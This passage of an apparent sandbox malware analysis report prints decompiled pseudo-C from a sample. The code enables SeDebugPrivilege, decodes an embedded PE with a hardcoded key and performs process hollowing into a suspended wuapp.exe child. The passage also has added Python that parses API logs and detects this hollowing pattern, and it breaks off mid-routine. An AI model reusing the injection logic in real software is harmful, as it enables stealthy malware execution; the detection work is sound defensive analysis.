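The three decompiled functions above (the resolver tail of E004021A0, the E00403050 retry loop and the RtlAdjustPrivilege call in E00402930) are quicker to triage from the report's "APIs" entries than from the pseudo-C. The Python below is an added example written for this page, not Joe Sandbox code and not code recovered from the sample: it parses lines in the report's `Api.Module(args), ref: addr` format, decodes the constants that matter (allocation type and page protection, privilege LUID, delay length) and reports the combination the decompilation shows. The four input lines are copied from this page's API entries and embedded as constructed input; the privilege, MEM_* and PAGE_* tables are standard Windows values; the thresholds in `triage` are an assumed heuristic for the example, not report logic.

```python
"""Decode sandbox "APIs" entries of the kind shown on this page.

Added example for this report; not Joe Sandbox code and not code from the
sample.  SAMPLE_API_LINES is constructed input copied from the four API
entries above, not a live sandbox feed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

SAMPLE_API_LINES = """\
• VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
• VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F
• Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
• Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085
"""

_LINE_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Standard Windows constants: SE_*_PRIVILEGE LUIDs (ntddk), MEM_* and PAGE_* flags.
PRIVILEGE_NAMES = {
    0x07: "SeTcbPrivilege",
    0x09: "SeTakeOwnershipPrivilege",
    0x0A: "SeLoadDriverPrivilege",
    0x11: "SeBackupPrivilege",
    0x12: "SeRestorePrivilege",
    0x13: "SeShutdownPrivilege",
    0x14: "SeDebugPrivilege",
    0x1D: "SeImpersonatePrivilege",
}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

Arg = Union[int, str, None]  # hex value, symbolic name, or None for '?' (unresolved by the sandbox)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int
    subcall: Optional[int] = None


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if _HEX8_RE.match(tok):
        return int(tok, 16)
    return tok  # a name the sandbox resolved, e.g. NtGetContextThread


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    sub = m.group("sub")
    return ApiCall(
        api=m.group("api"),
        module=m.group("module"),
        args=[_parse_arg(t) for t in m.group("args").split(",")],
        ref=int(m.group("ref"), 16),
        subcall=int(sub, 16) if sub else None,
    )


def parse_report_apis(text: str) -> List[ApiCall]:
    """Parse every line in the entry format; headings and blank lines are skipped."""
    calls = [parse_api_line(l) for l in text.splitlines()]
    return [c for c in calls if c is not None]


def _flags(value: Arg, table: dict) -> str:
    if not isinstance(value, int):
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def describe(call: ApiCall) -> str:
    """Human-readable decoding of the arguments that matter for injection staging."""
    a = call.args
    if call.api == "VirtualAlloc" and len(a) >= 4 and all(isinstance(x, int) for x in a[:4]):
        prot = PAGE_PROTECT.get(a[3], hex(a[3]))
        return f"VirtualAlloc size={a[1]:#x} type={_flags(a[2], MEM_FLAGS)} protect={prot}"
    if call.api == "VirtualFree" and len(a) >= 3:
        return f"VirtualFree type={_flags(a[2], MEM_FLAGS)}"
    if call.api == "RtlAdjustPrivilege" and len(a) >= 3 and all(isinstance(x, int) for x in a[:3]):
        name = PRIVILEGE_NAMES.get(a[0], f"privilege {a[0]:#x}")
        action = "enable" if a[1] == 1 else "disable"
        scope = "thread token" if a[2] else "process token"
        return f"RtlAdjustPrivilege {action} {name} on {scope}"
    if call.api == "Sleep" and a and isinstance(a[0], int):
        return f"Sleep {a[0]} ms"
    return f"{call.api} ({len(a)} args)"


def triage(calls: List[ApiCall]) -> List[str]:
    """Indicators of injection staging seen across this sample's three functions.

    Thresholds are an assumed heuristic for the example, not report logic: any one
    indicator alone is ordinary noise, the combination is what merits a look.
    """
    findings = []
    for c in calls:
        a = c.args
        if c.api == "RtlAdjustPrivilege" and len(a) >= 2 and a[0] == 0x14 and a[1] == 1:
            findings.append(f"SeDebugPrivilege enabled at {c.ref:#010x}")
        if c.api == "VirtualAlloc" and len(a) >= 4 and isinstance(a[3], int):
            if a[3] & 0x40:
                findings.append(f"RWX allocation at {c.ref:#010x}")
            elif a[3] == 0x04 and a[0] == 0:
                findings.append(f"fresh RW allocation at {c.ref:#010x}")
        if c.api == "Sleep" and a and isinstance(a[0], int) and 100 <= a[0] <= 5000:
            findings.append(f"fixed retry delay {a[0]} ms at {c.ref:#010x}")
    return findings


if __name__ == "__main__":
    parsed = parse_report_apis(SAMPLE_API_LINES)
    for call in parsed:
        print(f"{call.ref:#010x}  {describe(call)}")
    for finding in triage(parsed):
        print("!", finding)
```

Run against the four lines from this page, `triage` returns the RW allocation at 004021F0, the SeDebugPrivilege enable at 0040293E and the 700 ms retry delay at 00403085, which is the staging sequence the decompilation spells out by hand.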
                                                                                                        Instruction addresses for the C-code above, starting at 0x00402930 (per-line address column; its alignment with the decompiled lines was lost in extraction)
                                                                                                        0x004029b4
                                                                                                        0x004029b4
                                                                                                        0x0040295f
                                                                                                        0x0040295f
                                                                                                        0x00402962
                                                                                                        0x00402962
                                                                                                        0x00402967
                                                                                                        0x0040296d
                                                                                                        0x00402971
                                                                                                        0x004029c8
                                                                                                        0x004029d0
                                                                                                        0x00402976
                                                                                                        0x00402976
                                                                                                        0x00402976
                                                                                                        0x00402971
                                                                                                        0x0040295d
                                                                                                        0x00402954

                                                                                                        APIs
                                                                                                        • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPrivilege
                                                                                                        • String ID:
                                                                                                        • API String ID: 3260937286-0
                                                                                                        • Opcode ID: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                        • Instruction ID: 506e94688713331cfc66463232599238f62637629a90eb22369aba3845a8fa88
                                                                                                        • Opcode Fuzzy Hash: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                        • Instruction Fuzzy Hash: 3811C8B0702609BBDB215F50ED0DBA63764E710349F10017BFD09352E0E7BA99D8DA9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00407ED0(WCHAR* _a4) {
                                                                                                        				signed char _t3;
                                                                                                        
                                                                                                        				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                        				// 0xffffffff == INVALID_FILE_ATTRIBUTES, 0x10 == FILE_ATTRIBUTE_DIRECTORY:
                                                                                                        				// returns 1 only for an existing, non-directory path (the APIs entry shows \System32\wuapp.exe as the argument)
                                                                                                        				if(_t3 == 0xffffffff || (_t3 & 0x00000010) != 0) {
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        			}




                                                                                                        Control-flow graph (graph view): basic-block addresses 0x00407ed6 .. 0x00407eef (instruction text not captured in the extraction)

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                        • Instruction ID: bc5cfff1355e279673e223a49d8db9145eaba15aaeeac5c753cdea018dd9536a
                                                                                                        • Opcode Fuzzy Hash: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                        • Instruction Fuzzy Hash: D2C0803040510C1BDF104568EC04255370CC701374F504B71FC1CD45F1D337BC924199
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
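
The two executed routines above (SeDebugPrivilege enabled through RtlAdjustPrivilege(0x14, ...) and an existence check on \System32\wuapp.exe) and the E00405420 routine that follows (a child created with 0x8000004 = CREATE_NO_WINDOW | CREATE_SUSPENDED, whose PEB->ImageBaseAddress is then read through GetThreadContext/EBX+8 or through a resolved ntdll pointer) together form the front half of process hollowing. The script below is an added example and is not code from the report or from the sample: it runs a small API-trace detector over constructed trace lines. The trace format, handle values and addresses are made up for this example; the assumption that the *0x5d108c pointer resolves to NtQueryInformationProcess (its argument pattern matches ProcessBasicInformation) and the later stages (NtUnmapViewOfSection, WriteProcessMemory, SetThreadContext, ResumeThread) are the standard remainder of the technique, not something shown in the excerpt.

```python
"""
Added example (not from the Joe Sandbox report or the sample): an API-trace
detector for the process-hollowing prefix seen in E00405420, plus the
SeDebugPrivilege enable from the RtlAdjustPrivilege routine. The trace
format and every sample line below are constructed for this example.
"""
import re

CREATE_SUSPENDED = 0x00000004
CREATE_NO_WINDOW = 0x08000000
CONTEXT_FULL_X86 = 0x00010007      # CONTEXT_CONTROL|CONTEXT_INTEGER|CONTEXT_SEGMENTS on x86
SE_DEBUG_PRIVILEGE = 0x14          # LUID 20, the value the sample passes to RtlAdjustPrivilege
IMAGE_BASE_OFFSET = 8              # PEB->ImageBaseAddress on 32-bit Windows

# Constructed line format: "<pid> <Api>(k=v, ...) [-> k=v, ...]"
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>[^)]*)\)(?:\s*->\s*(?P<ret>.*))?$")

def _kv(text):
    """Parse 'k=v, k=v' into a dict; quotes around values are dropped."""
    out = {}
    for part in text.split(","):
        if "=" in part:
            k, v = part.split("=", 1)
            out[k.strip()] = v.strip().strip('"')
    return out

def _int(s):
    return int(s, 0) if s else 0

def decode_creation_flags(flags):
    """Names of the two CreateProcess flags the sample combines (0x8000004)."""
    names = []
    if flags & CREATE_SUSPENDED:
        names.append("CREATE_SUSPENDED")
    if flags & CREATE_NO_WINDOW:
        names.append("CREATE_NO_WINDOW")
    return names

def detect_hollowing(lines):
    """One finding per suspended child whose PEB->ImageBaseAddress was read.
    Verdict 'hollowing' needs the standard remainder (WriteProcessMemory,
    SetThreadContext, ResumeThread); otherwise it is 'hollowing-prefix'."""
    children, by_thread, debug_priv = {}, {}, set()
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        pid, api = int(m["pid"]), m["api"]
        args, ret = _kv(m["args"]), _kv(m["ret"] or "")
        if (api == "RtlAdjustPrivilege" and _int(args.get("Privilege")) == SE_DEBUG_PRIVILEGE
                and _int(args.get("Enable")) == 1):
            debug_priv.add(pid)
            continue
        if api == "CreateProcessW":
            flags = _int(args.get("dwCreationFlags"))
            if flags & CREATE_SUSPENDED and "hProcess" in ret:
                key = (pid, ret["hProcess"])
                children[key] = {"pid": pid, "image": args.get("lpCommandLine"),
                                 "flags": decode_creation_flags(flags), "peb": None,
                                 "stages": ["CreateProcessW(CREATE_SUSPENDED)"]}
                by_thread[(pid, ret.get("hThread"))] = key
            continue
        key = by_thread.get((pid, args.get("hThread"))) or (pid, args.get("hProcess"))
        rec = children.get(key)
        if rec is None:
            continue
        if api == "GetThreadContext" and (_int(args.get("ContextFlags")) & CONTEXT_FULL_X86) == CONTEXT_FULL_X86:
            rec["peb"] = _int(ret.get("Ebx"))     # EBX of a fresh suspended x86 thread points at the PEB
            rec["stages"].append("GetThreadContext(CONTEXT_FULL)")
        elif api == "NtQueryInformationProcess" and _int(args.get("ProcessInformationClass")) == 0:
            rec["peb"] = _int(ret.get("PebBaseAddress"))
            rec["stages"].append("NtQueryInformationProcess(ProcessBasicInformation)")
        elif (api == "ReadProcessMemory" and rec["peb"] is not None
              and _int(args.get("lpBaseAddress")) == rec["peb"] + IMAGE_BASE_OFFSET
              and _int(args.get("nSize")) == 4):
            rec["stages"].append("ReadProcessMemory(PEB->ImageBaseAddress)")
        elif api in ("NtUnmapViewOfSection", "WriteProcessMemory", "SetThreadContext", "ResumeThread"):
            rec["stages"].append(api)
    findings = []
    for rec in children.values():
        stages = rec["stages"]
        if not any(s.startswith("ReadProcessMemory") for s in stages):
            continue                              # a suspended start alone is not evidence
        done = {"WriteProcessMemory", "SetThreadContext", "ResumeThread"} <= set(stages)
        findings.append({"pid": rec["pid"], "image": rec["image"], "flags": rec["flags"],
                         "sedebug": rec["pid"] in debug_priv, "stages": stages,
                         "verdict": "hollowing" if done else "hollowing-prefix"})
    return findings

SAMPLE_TRACE = [  # constructed; pids, handles and addresses are made up
    r'2868 RtlAdjustPrivilege(Privilege=0x14, Enable=0x1, CurrentThread=0x0)',
    r'2868 CreateProcessW(lpCommandLine="C:\Windows\System32\wuapp.exe", dwCreationFlags=0x8000004) -> hProcess=0x1a4, hThread=0x1a8',
    r'2868 GetThreadContext(hThread=0x1a8, ContextFlags=0x10007) -> Ebx=0x7ffde000',
    r'2868 ReadProcessMemory(hProcess=0x1a4, lpBaseAddress=0x7ffde008, nSize=0x4) -> bytesRead=0x4',
    r'2868 NtUnmapViewOfSection(hProcess=0x1a4, BaseAddress=0x400000)',
    r'2868 WriteProcessMemory(hProcess=0x1a4, lpBaseAddress=0x400000, nSize=0x400)',
    r'2868 SetThreadContext(hThread=0x1a8)',
    r'2868 ResumeThread(hThread=0x1a8)',
    # second path of E00405420 (PEB located via the resolved pointer), aborted as in its L9 branch
    r'3104 CreateProcessW(lpCommandLine="C:\Windows\System32\wuapp.exe", dwCreationFlags=0x8000004) -> hProcess=0x1c0, hThread=0x1c4',
    r'3104 NtQueryInformationProcess(hProcess=0x1c0, ProcessInformationClass=0x0) -> PebBaseAddress=0x7ffd9000',
    r'3104 ReadProcessMemory(hProcess=0x1c0, lpBaseAddress=0x7ffd9008, nSize=0x4) -> bytesRead=0x4',
    r'3104 TerminateProcess(hProcess=0x1c0, uExitCode=0x0)',
    # benign: debugger-style suspended start that never touches the image base
    r'1204 CreateProcessW(lpCommandLine="notepad.exe", dwCreationFlags=0x4) -> hProcess=0x2b0, hThread=0x2b4',
    r'1204 GetThreadContext(hThread=0x2b4, ContextFlags=0x10007) -> Ebx=0x7ffdf000',
    r'1204 ResumeThread(hThread=0x2b4)',
]

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f["pid"], f["verdict"], f["image"], f["flags"], "SeDebug" if f["sedebug"] else "", f["stages"])
```

The key is correlating the ReadProcessMemory address with the PEB pointer obtained a few calls earlier (EBX from the suspended thread's context, or PebBaseAddress from the process query); a 4-byte read at exactly PEB+8 is what separates the hollowing pattern from a debugger that also starts its target suspended. The pid 3104 case shows why the prefix alone should still be reported: the sample's own L9 branch terminates the child on any failure, so an aborted attempt leaves no later stages behind.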

                                                                                                        Non-executed Functions

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E00405420(char* __ecx, struct HINSTANCE__* __edx, void* __eflags, WCHAR* _a4) {
                                                                                                        				CHAR* _v8;
                                                                                                        				void _v12;
                                                                                                        				CHAR* _v16;
                                                                                                        				struct HINSTANCE__* _v20;
                                                                                                        				struct HINSTANCE__* _v24;
                                                                                                        				void* _v28;
                                                                                                        				void* _v32;
                                                                                                        				CHAR** _v36;
                                                                                                        				long _v40;
                                                                                                        				struct _PROCESS_INFORMATION _v56;
                                                                                                        				long _v60;
                                                                                                        				long _v64;
                                                                                                        				intOrPtr _v68;
                                                                                                        				long _v72;
                                                                                                        				void* _v76;
                                                                                                        				char _v80;
                                                                                                        				char _v83;
                                                                                                        				intOrPtr _v87;
                                                                                                        				char _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				long _v100;
                                                                                                        				long _v108;
                                                                                                        				intOrPtr _v128;
                                                                                                        				char _v132;
                                                                                                        				struct _STARTUPINFOW _v200;
                                                                                                        				struct _CONTEXT _v916;
                                                                                                        				int _t154;
                                                                                                        				CHAR* _t155;
                                                                                                        				CHAR* _t156;
                                                                                                        				void* _t160;
                                                                                                        				void* _t161;
                                                                                                        				CHAR* _t162;
                                                                                                        				CHAR* _t163;
                                                                                                        				CHAR* _t175;
                                                                                                        				CHAR* _t178;
                                                                                                        				intOrPtr _t179;
                                                                                                        				CHAR** _t180;
                                                                                                        				CHAR* _t186;
                                                                                                        				CHAR* _t190;
                                                                                                        				CHAR* _t194;
                                                                                                        				void* _t197;
                                                                                                        				long _t199;
                                                                                                        				CHAR* _t208;
                                                                                                        				signed short _t211;
                                                                                                        				CHAR* _t213;
                                                                                                        				_Unknown_base(*)()* _t214;
                                                                                                        				intOrPtr _t218;
                                                                                                        				CHAR* _t225;
                                                                                                        				CHAR* _t229;
                                                                                                        				void* _t234;
                                                                                                        				void* _t235;
                                                                                                        				CHAR* _t250;
                                                                                                        				CHAR* _t261;
                                                                                                        				CHAR* _t266;
                                                                                                        				CHAR** _t273;
                                                                                                        				CHAR* _t275;
                                                                                                        				CHAR* _t278;
                                                                                                        				CHAR* _t284;
                                                                                                        				signed int _t285;
                                                                                                        				signed int _t286;
                                                                                                        				struct HINSTANCE__* _t287;
                                                                                                        				CHAR** _t288;
                                                                                                        				CHAR* _t291;
                                                                                                        				long _t294;
                                                                                                        				CHAR* _t295;
                                                                                                        				_Unknown_base(*)()** _t297;
                                                                                                        				CHAR** _t299;
                                                                                                        				intOrPtr _t301;
                                                                                                        				long _t304;
                                                                                                        				void* _t305;
                                                                                                        				void* _t307;
                                                                                                        				CHAR* _t309;
                                                                                                        				signed short* _t310;
                                                                                                        				CHAR** _t311;
                                                                                                        				void* _t312;
                                                                                                        				signed short* _t314;
                                                                                                        				CHAR* _t315;
                                                                                                        				void* _t316;
                                                                                                        				void* _t317;
                                                                                                        				void* _t318;
                                                                                                        				void* _t320;
                                                                                                        				void* _t324;
                                                                                                        
                                                                                                        				_t287 = __edx;
                                                                                                        				_t280 = __ecx;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				_v12 = 0;
                                                                                                        				_v72 = 0;
                                                                                                        				_v40 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				_v64 = 0;
                                                                                                        				_v60 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_v16 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_v76 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				asm("movups [ebp-0x80], xmm0");
                                                                                                        				asm("movq [ebp-0x70], xmm0");
                                                                                                        				asm("movq [ebp-0x60], xmm0");
                                                                                                        				asm("movq [ebp-0x68], xmm0");
                                                                                                        				asm("movups [ebp-0x34], xmm0");
                                                                                                        				E00401BB0( &_v200, 0, 0x44); // memset: STARTUPINFOW is 0x44 bytes on x86
                                                                                                        				E00401BB0( &_v916, 0, 0x2cc); // memset: x86 CONTEXT is 0x2cc bytes
                                                                                                        				_v200.cb = 0x44;
                                                                                                        				_t317 = _t316 + 0x18;
                                                                                                        				_t324 =  *0x40c038 - 0x5a4d; // 0x6b7d   -- does the embedded blob at 0x40c038 already start with 'MZ' (0x5a4d)?
                                                                                                        				if(_t324 != 0) {
                                                                                                        					// 16-byte key, 0xe7c00-byte blob: presumably decodes the embedded PE in place (E00401CE0 is not shown here, so the scheme is not confirmed)
                                                                                                        					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
                                                                                                        					_t317 = _t317 + 0x10;
                                                                                                        				}
                                                                                                        				_t154 = CreateProcessW(0, _a4, 0, 0, 0, 0x8000004, 0, 0,  &_v200,  &_v56); // 0x8000004 == CREATE_NO_WINDOW | CREATE_SUSPENDED
                                                                                                        				if(_t154 != 0) {
                                                                                                        					_t155 =  *0x5d108c; // resolved ntdll pointer; the call below (hProcess, 0, &buf, 0x18, NULL) matches NtQueryInformationProcess(ProcessBasicInformation), which is an inference, not confirmed here
                                                                                                        					__eflags = _t155;
                                                                                                        					if(_t155 != 0) {
                                                                                                        						_t280 =  &_v132;
                                                                                                        						_t156 =  *_t155(_v56.hProcess, 0,  &_v132, 0x18, 0); // non-zero NTSTATUS == failure
                                                                                                        						__eflags = _t156;
                                                                                                        						if(_t156 != 0) {
                                                                                                        							goto L9;
                                                                                                        						} else {
                                                                                                        							_t175 = ReadProcessMemory(_v56.hProcess, _v128 + 8,  &_v12, 4,  &_v40); // _v128 would be PROCESS_BASIC_INFORMATION.PebBaseAddress; PEB+8 == ImageBaseAddress of the suspended child
                                                                                                        							__eflags = _t175;
                                                                                                        							if(_t175 == 0) {
                                                                                                        								goto L8;
                                                                                                        							} else {
                                                                                                        								__eflags = _v40 - 4;
                                                                                                        								if(_v40 != 4) {
                                                                                                        									goto L8;
                                                                                                        								} else {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_v916.ContextFlags = 0x10007; // CONTEXT_FULL on x86 (CONTROL | INTEGER | SEGMENTS)
                                                                                                        						_t261 = GetThreadContext(_v56.hThread,  &_v916); // context of the still-suspended primary thread
                                                                                                        						__eflags = _t261;
                                                                                                        						if(_t261 == 0) {
                                                                                                        							L9: // common failure path: kill the suspended child and release every handle and buffer
                                                                                                        							TerminateProcess(_v56.hProcess, 0);
                                                                                                        							CloseHandle(_v56.hProcess);
                                                                                                        							CloseHandle(_v56.hThread);
                                                                                                        							_t160 = _v28;
                                                                                                        							__eflags = _t160;
                                                                                                        							if(_t160 != 0) {
                                                                                                        								NtClose(_t160);
                                                                                                        							}
                                                                                                        							_t161 = _v32;
                                                                                                        							__eflags = _t161;
                                                                                                        							if(_t161 != 0) {
                                                                                                        								NtClose(_t161);
                                                                                                        							}
                                                                                                        							_t162 = _v16;
                                                                                                        							__eflags = _t162;
                                                                                                        							if(_t162 != 0) {
                                                                                                        								asm("cdq");
                                                                                                        								E00407120(_t287, GetCurrentProcess(), _t162, _t287);
                                                                                                        							}
                                                                                                        							_t163 = _v8;
                                                                                                        							__eflags = _t163;
                                                                                                        							if(_t163 != 0) {
                                                                                                        								asm("cdq");
                                                                                                        								E00407120(_t287, GetCurrentProcess(), _t163, _t287);
                                                                                                        							}
                                                                                                        							__eflags = 0;
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							_t266 = ReadProcessMemory(_v56.hProcess, _v916.Ebx + 8,  &_v12, 4,  &_v40);
                                                                                                        							__eflags = _t266;
                                                                                                        							if(_t266 == 0) {
                                                                                                        								L8:
                                                                                                        								goto L9;
                                                                                                        							} else {
                                                                                                        								__eflags = _v40 - 4;
                                                                                                        								if(_v40 == 4) {
                                                                                                        									L21:
                                                                                                        									_t178 = E00405A50(_t280, _v56.hProcess, _v12,  &_v20,  &_v72);
                                                                                                        									_t318 = _t317 + 0x10;
                                                                                                        									__eflags = _t178;
                                                                                                        									if(_t178 == 0) {
                                                                                                        										goto L8;
                                                                                                        									} else {
                                                                                                        										__eflags =  *0x40c038 - 0x5a4d; // 0x6b7d
                                                                                                        										if(__eflags != 0) {
                                                                                                        											goto L8;
                                                                                                        										} else {
                                                                                                        											_t179 =  *0x40c074; // 0x383538b7
                                                                                                        											__eflags =  *((intOrPtr*)(_t179 + 0x40c038)) - 0x4550;
                                                                                                        											_t180 = _t179 + 0x40c038;
                                                                                                        											_v36 = _t180;
                                                                                                        											if( *((intOrPtr*)(_t179 + 0x40c038)) != 0x4550) {
                                                                                                        												goto L8;
                                                                                                        											} else {
                                                                                                        												__eflags =  *((intOrPtr*)(_t180 + 0x18)) - 0x10b;
                                                                                                        												if( *((intOrPtr*)(_t180 + 0x18)) != 0x10b) {
                                                                                                        													goto L8;
                                                                                                        												} else {
                                                                                                        													__eflags =  *(_t180 + 0xa0);
                                                                                                        													_t304 =  *(_t180 + 0x50);
                                                                                                        													_v68 =  *((intOrPtr*)(_t180 + 0x34));
                                                                                                        													_t283 =  *((intOrPtr*)(_t180 + 0x28));
                                                                                                        													_v80 =  *((intOrPtr*)(_t180 + 0x28));
                                                                                                        													if(__eflags == 0) {
                                                                                                        														goto L8;
                                                                                                        													} else {
                                                                                                        														_t294 = _v20;
                                                                                                        														_v100 = _t294;
                                                                                                        														__eflags = E00406F00(_t283, _t287, __eflags,  &_v28, 0xf001f, 0,  &_v100, 0x40, 0x8000000, 0);
                                                                                                        														if(__eflags != 0) {
                                                                                                        															goto L8;
                                                                                                        														} else {
                                                                                                        															_v108 = _t304;
                                                                                                        															_t186 = E00406F00(_t283, _t287, __eflags,  &_v32, 0xf001f, 0,  &_v108, 0x40, 0x8000000, _t183);
                                                                                                        															__eflags = _t186;
                                                                                                        															if(_t186 != 0) {
                                                                                                        																goto L8;
                                                                                                        															} else {
                                                                                                        																_v16 = _t186;
                                                                                                        																_v64 = _t294;
                                                                                                        																_t190 = E00406FE0(_t283, _t287, _v28, GetCurrentProcess(),  &_v16, 0, 0, 0,  &_v64, 1, _t186, 0x40);
                                                                                                        																__eflags = _t190;
                                                                                                        																if(_t190 != 0) {
                                                                                                        																	goto L8;
                                                                                                        																} else {
                                                                                                        																	_v8 = _t190;
                                                                                                        																	_v60 = _t304;
                                                                                                        																	_t194 = E00406FE0(_t283, _t287, _v32, GetCurrentProcess(),  &_v8, 0, 0, 0,  &_v60, 1, _t190, 0x40);
                                                                                                        																	__eflags = _t194;
                                                                                                        																	if(_t194 != 0) {
                                                                                                        																		goto L8;
                                                                                                        																	} else {
                                                                                                        																		_v24 = _t194;
                                                                                                        																		_t197 = E00406FE0(_t283, _t287, _v32, _v56.hProcess,  &_v24, 0, 0, 0,  &_v60, 1, _t194, 0x40);
                                                                                                        																		__eflags = _t197;
                                                                                                        																		if(_t197 != 0) {
                                                                                                        																			goto L8;
                                                                                                        																		} else {
                                                                                                        																			_t305 = VirtualAlloc(_t197, _t294, 0x3000, 4);
                                                                                                        																			__eflags = _t305;
                                                                                                        																			if(_t305 == 0) {
                                                                                                        																				goto L8;
                                                                                                        																			} else {
                                                                                                        																				_t199 = ReadProcessMemory(_v56.hProcess, _v12, _t305, _t294, 0);
                                                                                                        																				__eflags = _t199;
                                                                                                        																				if(_t199 != 0) {
                                                                                                        																					E00401640(_v16, _t305, _t294);
                                                                                                        																					VirtualFree(_t305, 0, 0x8000);
                                                                                                        																					_t273 = _v36;
                                                                                                        																					_t295 =  *(_t273 + 6) & 0x0000ffff;
                                                                                                        																					_t82 = _t273 + 0x18; // 0x18
                                                                                                        																					_t307 = _t82 + ( *(_t273 + 0x14) & 0x0000ffff);
                                                                                                        																					E00401640(_v8, 0x40c038, (_t295 + _t295 * 4 << 3) - 0x40c038 + _t307);
                                                                                                        																					_t320 = _t318 + 0x18;
                                                                                                        																					__eflags = _t295;
                                                                                                        																					if(_t295 != 0) {
                                                                                                        																						_t315 = _t307 + 0x14;
                                                                                                        																						__eflags = _t315;
                                                                                                        																						do {
                                                                                                        																							E00401640( *((intOrPtr*)(_t315 - 8)) + _v8,  *_t315 + 0x40c038,  *((intOrPtr*)(_t315 - 4)));
                                                                                                        																							_t320 = _t320 + 0xc;
                                                                                                        																							_t315 =  &(_t315[0x28]);
                                                                                                        																							_t295 = _t295 - 1;
                                                                                                        																							__eflags = _t295;
                                                                                                        																						} while (_t295 != 0);
                                                                                                        																					}
                                                                                                        																					_t284 = _v8;
                                                                                                        																					_t275 =  *((intOrPtr*)(_t273 + 0x80)) + _t284;
                                                                                                        																					__eflags = _t275;
                                                                                                        																					while(1) {
                                                                                                        																						_t208 = _t275[0xc];
                                                                                                        																						__eflags = _t208;
                                                                                                        																						if(_t208 != 0) {
                                                                                                        																							goto L40;
                                                                                                        																						}
                                                                                                        																						__eflags = _t275[4] - _t208;
                                                                                                        																						if(_t275[4] == _t208) {
                                                                                                        																							_t311 = _v36;
                                                                                                        																							_t287 = _v24;
                                                                                                        																							_v68 = _t287 - _v68;
                                                                                                        																							_t299 =  *((intOrPtr*)(_t311 + 0xa0)) + _t284;
                                                                                                        																							_t218 =  *((intOrPtr*)(_t311 + 0xa4)) + _t299;
                                                                                                        																							_v36 = _t299;
                                                                                                        																							_v92 = _t218;
                                                                                                        																							__eflags = _t299 - _t218;
                                                                                                        																							if(_t299 < _t218) {
                                                                                                        																								while(1) {
                                                                                                        																									_t250 =  *_t299;
                                                                                                        																									__eflags = _t250;
                                                                                                        																									if(_t250 == 0) {
                                                                                                        																										break;
                                                                                                        																									}
                                                                                                        																									_t288 =  &(_t299[1]);
                                                                                                        																									_v20 = _t288;
                                                                                                        																									_t314 =  &(_t299[2]);
                                                                                                        																									_t278 =  &(_t250[_t284]);
                                                                                                        																									_t291 =  *_t288 - 8 >> 1;
                                                                                                        																									__eflags = _t291;
                                                                                                        																									if(_t291 != 0) {
                                                                                                        																										_t301 = _v68;
                                                                                                        																										do {
                                                                                                        																											_t285 =  *_t314 & 0x0000ffff;
                                                                                                        																											_t291 = _t291 - 1;
